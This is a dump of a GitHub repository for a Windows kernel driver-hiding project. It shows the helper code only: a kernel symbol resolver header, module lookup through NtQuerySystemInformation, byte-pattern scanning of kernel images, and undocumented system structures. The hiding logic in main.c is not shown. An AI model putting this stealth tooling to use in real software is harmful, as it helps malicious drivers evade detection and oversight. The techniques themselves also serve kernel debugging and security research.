符号解析器:[Oxygen1a1/oxgenPdb: a Windows kernel Pdb parsing and downloading library that running purely in kernel mode without any R3 programs. (github.com)](https://github.com/Oxygen1a1/oxgenPdb) 10 | 11 | 原隐藏傀儡项目:[IcEy-999/Drv_Hide_And_Camouflage (github.com)](https://github.com/IcEy-999/Drv_Hide_And_Camouflage) 12 | -------------------------------------------------------------------------------- /main.c: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/main.c -------------------------------------------------------------------------------- /oxygenPdb.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | 5 | #include 6 | 7 | 8 | namespace oxygenPdb { 9 | 10 | class Pdber { 11 | 12 | public: 13 | Pdber(const wchar_t* moduleName); 14 | bool init(); 15 | ~Pdber(); 16 | ULONG_PTR GetPointer(const char* name); 17 | size_t GetOffset(const char* structName, const char* propertyName); 18 | private: 19 | char padding[1000];//can not revise this!!! else it will ocurrs stack overflow!! 20 | }; 21 | 22 | } 23 | -------------------------------------------------------------------------------- /oxygenpdb.lib: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/2367765883/hidedriver-normal/aa6002645de014bfc506870c6b3308b64cc4acfe/oxygenpdb.lib -------------------------------------------------------------------------------- /tools.c: -------------------------------------------------------------------------------- 1 | #include "tools.h" 2 | #include 3 | #include 4 | 5 | UINT64 _strcmp_a(LPSTR s1, LPSTR s2) 6 | { 7 | char c1, c2; 8 | 9 | if (s1 == s2) 10 | return 0; 11 | 12 | if (s1 == 0) 13 | return (UINT64)-1; 14 | 15 | if (s2 == 0) 16 | return 1; 17 | 18 | do { 19 | c1 = *s1; 20 | c2 = *s2; 21 | s1++; 22 | s2++; 23 | } while ((c1 != 0) && ((c1 | 0x20) == (c2 | 0x20))); 24 | 25 | return (int)((INT64)(c1 | 0x20) - (c2 | 0x20)); 26 | } 27 | 28 | UINT64 strfind(LPSTR str1, LPSTR str2) { 29 | UINT64 str2len = strlen(str2); 30 | UINT64 str1len = strlen(str1); 31 | char temp; 32 | if (str1len > str2len) { 33 | for (UINT64 i = 0; i <= str1len - str2len; i++) { 34 | temp = str1[str2len + i]; 35 | str1[str2len + i] = 0; 36 | if (_strcmp_a(&str1[i], str2) == 0) { 37 | return i; 38 | } 39 | 40 | str1[str2len + i] = temp; 41 | } 42 | } 43 | return (UINT64)-1; 44 | } 45 | 46 | 47 | EXTERN_C RTL_PROCESS_MODULE_INFORMATION GetSystemModuleInfo(LPSTR ModuleName) { 48 | ULONG BufferSizeNeed = 0; 49 | RTL_PROCESS_MODULE_INFORMATION ret; 50 | PRTL_PROCESS_MODULES Buffer = 0; 51 | NTSTATUS status; 52 | INT T; 53 | RtlZeroMemory(&ret, sizeof(ret)); 54 | 55 | __try { 56 | status = NtQuerySystemInformation(11, &BufferSizeNeed, BufferSizeNeed, &BufferSizeNeed); 57 | Buffer = ExAllocatePoolWithTag(NonPagedPool, BufferSizeNeed, 35353535); 58 | if (Buffer) { 59 | status = NtQuerySystemInformation(11, Buffer, BufferSizeNeed, &BufferSizeNeed); 60 | 61 | if (NT_SUCCESS(status)) { 62 | T = Buffer->NumberOfModules; 63 | while ((T--) >= 0) { 64 | if ((INT64)Buffer->Modules[T].ImageBase != 0x140000000 && strfind(Buffer->Modules[T].FullPathName, ModuleName) != -1) { 65 | ret = Buffer->Modules[T]; 66 | break; 67 | } 68 | if (T == 0) ret.ImageBase = 0; 69 | } 70 | } 71 | ExFreePoolWithTag(Buffer, 0); 72 | } 73 | } 74 | __except (EXCEPTION_EXECUTE_HANDLER) { 75 | 76 | } 77 | return ret; 78 | } 79 | 80 | BOOLEAN CheckMask(CHAR* base, CHAR* pattern, CHAR* mask) 81 | { 82 | for (; *mask; ++base, ++pattern, ++mask) 83 | { 84 | if ('x' == *mask && *base != *pattern) 85 | { 86 | return FALSE; 87 | } 88 | } 89 | return TRUE; 90 | } 91 | 92 | 93 | PVOID FindPattern(PVOID base, INT length, CHAR* pattern, CHAR* mask) 94 | { 95 | length -= (INT)(strlen(mask)); 96 | for (INT i = 0; i <= length; ++i) 97 | { 98 | CHAR* data = (CHAR*)base; 99 | PVOID address = &data[i]; 100 | if (CheckMask(address, pattern, mask)) 101 | return address; 102 | } 103 | return NULL; 104 | } 105 | 106 | EXTERN_C PVOID FindPatternImage(PVOID base, CHAR* pattern, CHAR* mask) 107 | { 108 | PVOID match = 0; 109 | PIMAGE_NT_HEADERS headers = (PIMAGE_NT_HEADERS)((CHAR*)base + ((PIMAGE_DOS_HEADER)base)->e_lfanew); 110 | PIMAGE_SECTION_HEADER sections = IMAGE_FIRST_SECTION(headers); 111 | for (ULONG64 i = 0; i < headers->FileHeader.NumberOfSections; ++i) { 112 | PIMAGE_SECTION_HEADER section = §ions[i]; 113 | if ('EGAP' == *(PINT64)section->Name || memcmp(section->Name, ".text", 5) == 0) { 114 | match = FindPattern((CHAR*)base + section->VirtualAddress, section->Misc.VirtualSize, pattern, mask); 115 | if (match) 116 | { 117 | break; 118 | } 119 | } 120 | } 121 | return match; 122 | } 123 | -------------------------------------------------------------------------------- /tools.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | typedef struct _RTL_PROCESS_MODULE_INFORMATION { 4 | HANDLE Section; 5 | PVOID MappedBase; 6 | PVOID ImageBase; 7 | ULONG ImageSize; 8 | ULONG Flags; 9 | USHORT LoadOrderIndex; 10 | USHORT InitOrderIndex; 11 | USHORT LoadCount; 12 | USHORT OffsetToFileName; 13 | CHAR FullPathName[256]; 14 | } RTL_PROCESS_MODULE_INFORMATION, * PRTL_PROCESS_MODULE_INFORMATION; 15 | 16 | typedef struct _RTL_PROCESS_MODULES { 17 | ULONG NumberOfModules; 18 | RTL_PROCESS_MODULE_INFORMATION Modules[1]; 19 | } RTL_PROCESS_MODULES, * PRTL_PROCESS_MODULES; 20 | 21 | 22 | typedef enum _SYSTEM_INFORMATION_CLASS 23 | { 24 | SystemBasicInformation = 0x0, 25 | SystemProcessorInformation = 0x1, 26 | SystemPerformanceInformation = 0x2, 27 | SystemTimeOfDayInformation = 0x3, 28 | SystemPathInformation = 0x4, 29 | SystemProcessInformation = 0x5, 30 | SystemCallCountInformation = 0x6, 31 | SystemDeviceInformation = 0x7, 32 | SystemProcessorPerformanceInformation = 0x8, 33 | SystemFlagsInformation = 0x9, 34 | SystemCallTimeInformation = 0xa, 35 | SystemModuleInformation = 0xb, 36 | SystemLocksInformation = 0xc, 37 | SystemStackTraceInformation = 0xd, 38 | SystemPagedPoolInformation = 0xe, 39 | SystemNonPagedPoolInformation = 0xf, 40 | SystemHandleInformation = 0x10, 41 | SystemObjectInformation = 0x11, 42 | SystemPageFileInformation = 0x12, 43 | SystemVdmInstemulInformation = 0x13, 44 | SystemVdmBopInformation = 0x14, 45 | SystemFileCacheInformation = 0x15, 46 | SystemPoolTagInformation = 0x16, 47 | SystemInterruptInformation = 0x17, 48 | SystemDpcBehaviorInformation = 0x18, 49 | SystemFullMemoryInformation = 0x19, 50 | SystemLoadGdiDriverInformation = 0x1a, 51 | SystemUnloadGdiDriverInformation = 0x1b, 52 | SystemTimeAdjustmentInformation = 0x1c, 53 | SystemSummaryMemoryInformation = 0x1d, 54 | SystemMirrorMemoryInformation = 0x1e, 55 | SystemPerformanceTraceInformation = 0x1f, 56 | SystemObsolete0 = 0x20, 57 | SystemExceptionInformation = 0x21, 58 | SystemCrashDumpStateInformation = 0x22, 59 | SystemKernelDebuggerInformation = 0x23, 60 | SystemContextSwitchInformation = 0x24, 61 | SystemRegistryQuotaInformation = 0x25, 62 | SystemExtendServiceTableInformation = 0x26, 63 | SystemPrioritySeperation = 0x27, 64 | SystemVerifierAddDriverInformation = 0x28, 65 | SystemVerifierRemoveDriverInformation = 0x29, 66 | SystemProcessorIdleInformation = 0x2a, 67 | SystemLegacyDriverInformation = 0x2b, 68 | SystemCurrentTimeZoneInformation = 0x2c, 69 | SystemLookasideInformation = 0x2d, 70 | SystemTimeSlipNotification = 0x2e, 71 | SystemSessionCreate = 0x2f, 72 | SystemSessionDetach = 0x30, 73 | SystemSessionInformation = 0x31, 74 | SystemRangeStartInformation = 0x32, 75 | SystemVerifierInformation = 0x33, 76 | SystemVerifierThunkExtend = 0x34, 77 | SystemSessionProcessInformation = 0x35, 78 | SystemLoadGdiDriverInSystemSpace = 0x36, 79 | SystemNumaProcessorMap = 0x37, 80 | SystemPrefetcherInformation = 0x38, 81 | SystemExtendedProcessInformation = 0x39, 82 | SystemRecommendedSharedDataAlignment = 0x3a, 83 | SystemComPlusPackage = 0x3b, 84 | SystemNumaAvailableMemory = 0x3c, 85 | SystemProcessorPowerInformation = 0x3d, 86 | SystemEmulationBasicInformation = 0x3e, 87 | SystemEmulationProcessorInformation = 0x3f, 88 | SystemExtendedHandleInformation = 0x40, 89 | SystemLostDelayedWriteInformation = 0x41, 90 | SystemBigPoolInformation = 0x42, 91 | SystemSessionPoolTagInformation = 0x43, 92 | SystemSessionMappedViewInformation = 0x44, 93 | SystemHotpatchInformation = 0x45, 94 | SystemObjectSecurityMode = 0x46, 95 | SystemWatchdogTimerHandler = 0x47, 96 | SystemWatchdogTimerInformation = 0x48, 97 | SystemLogicalProcessorInformation = 0x49, 98 | SystemWow64SharedInformationObsolete = 0x4a, 99 | SystemRegisterFirmwareTableInformationHandler = 0x4b, 100 | SystemFirmwareTableInformation = 0x4c, 101 | SystemModuleInformationEx = 0x4d, 102 | SystemVerifierTriageInformation = 0x4e, 103 | SystemSuperfetchInformation = 0x4f, 104 | SystemMemoryListInformation = 0x50, 105 | SystemFileCacheInformationEx = 0x51, 106 | SystemThreadPriorityClientIdInformation = 0x52, 107 | SystemProcessorIdleCycleTimeInformation = 0x53, 108 | SystemVerifierCancellationInformation = 0x54, 109 | SystemProcessorPowerInformationEx = 0x55, 110 | SystemRefTraceInformation = 0x56, 111 | SystemSpecialPoolInformation = 0x57, 112 | SystemProcessIdInformation = 0x58, 113 | SystemErrorPortInformation = 0x59, 114 | SystemBootEnvironmentInformation = 0x5a, 115 | SystemHypervisorInformation = 0x5b, 116 | SystemVerifierInformationEx = 0x5c, 117 | SystemTimeZoneInformation = 0x5d, 118 | SystemImageFileExecutionOptionsInformation = 0x5e, 119 | SystemCoverageInformation = 0x5f, 120 | SystemPrefetchPatchInformation = 0x60, 121 | SystemVerifierFaultsInformation = 0x61, 122 | SystemSystemPartitionInformation = 0x62, 123 | SystemSystemDiskInformation = 0x63, 124 | SystemProcessorPerformanceDistribution = 0x64, 125 | SystemNumaProximityNodeInformation = 0x65, 126 | SystemDynamicTimeZoneInformation = 0x66, 127 | SystemCodeIntegrityInformation = 0x67, 128 | SystemProcessorMicrocodeUpdateInformation = 0x68, 129 | SystemProcessorBrandString = 0x69, 130 | SystemVirtualAddressInformation = 0x6a, 131 | SystemLogicalProcessorAndGroupInformation = 0x6b, 132 | SystemProcessorCycleTimeInformation = 0x6c, 133 | SystemStoreInformation = 0x6d, 134 | SystemRegistryAppendString = 0x6e, 135 | SystemAitSamplingValue = 0x6f, 136 | SystemVhdBootInformation = 0x70, 137 | SystemCpuQuotaInformation = 0x71, 138 | SystemNativeBasicInformation = 0x72, 139 | SystemErrorPortTimeouts = 0x73, 140 | SystemLowPriorityIoInformation = 0x74, 141 | SystemBootEntropyInformation = 0x75, 142 | SystemVerifierCountersInformation = 0x76, 143 | SystemPagedPoolInformationEx = 0x77, 144 | SystemSystemPtesInformationEx = 0x78, 145 | SystemNodeDistanceInformation = 0x79, 146 | SystemAcpiAuditInformation = 0x7a, 147 | SystemBasicPerformanceInformation = 0x7b, 148 | SystemQueryPerformanceCounterInformation = 0x7c, 149 | SystemSessionBigPoolInformation = 0x7d, 150 | SystemBootGraphicsInformation = 0x7e, 151 | SystemScrubPhysicalMemoryInformation = 0x7f, 152 | SystemBadPageInformation = 0x80, 153 | SystemProcessorProfileControlArea = 0x81, 154 | SystemCombinePhysicalMemoryInformation = 0x82, 155 | SystemEntropyInterruptTimingInformation = 0x83, 156 | SystemConsoleInformation = 0x84, 157 | SystemPlatformBinaryInformation = 0x85, 158 | SystemThrottleNotificationInformation = 0x86, 159 | SystemHypervisorProcessorCountInformation = 0x87, 160 | SystemDeviceDataInformation = 0x88, 161 | SystemDeviceDataEnumerationInformation = 0x89, 162 | SystemMemoryTopologyInformation = 0x8a, 163 | SystemMemoryChannelInformation = 0x8b, 164 | SystemBootLogoInformation = 0x8c, 165 | SystemProcessorPerformanceInformationEx = 0x8d, 166 | SystemSpare0 = 0x8e, 167 | SystemSecureBootPolicyInformation = 0x8f, 168 | SystemPageFileInformationEx = 0x90, 169 | SystemSecureBootInformation = 0x91, 170 | SystemEntropyInterruptTimingRawInformation = 0x92, 171 | SystemPortableWorkspaceEfiLauncherInformation = 0x93, 172 | SystemFullProcessInformation = 0x94, 173 | SystemKernelDebuggerInformationEx = 0x95, 174 | SystemBootMetadataInformation = 0x96, 175 | SystemSoftRebootInformation = 0x97, 176 | SystemElamCertificateInformation = 0x98, 177 | SystemOfflineDumpConfigInformation = 0x99, 178 | SystemProcessorFeaturesInformation = 0x9a, 179 | SystemRegistryReconciliationInformation = 0x9b, 180 | MaxSystemInfoClass = 0x9c, 181 | } SYSTEM_INFORMATION_CLASS; 182 | 183 | EXTERN_C NTKERNELAPI NTSTATUS NtQuerySystemInformation(_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass, _Inout_ PVOID SystemInformation, _In_ ULONG SystemInformationLength, _Out_opt_ PULONG ReturnLength); 184 | EXTERN_C RTL_PROCESS_MODULE_INFORMATION GetSystemModuleInfo(LPSTR ModuleName); 185 | EXTERN_C PVOID FindPatternImage(PVOID base, CHAR* pattern, CHAR* mask); 186 | 187 | #define RELATIVE_ADDRESS(address, size) ((VOID*)((UINT8*)(address) + *(INT32*)((UINT8*)(address) + ((size) - (INT32)sizeof(INT32))) + (size))) --------------------------------------------------------------------------------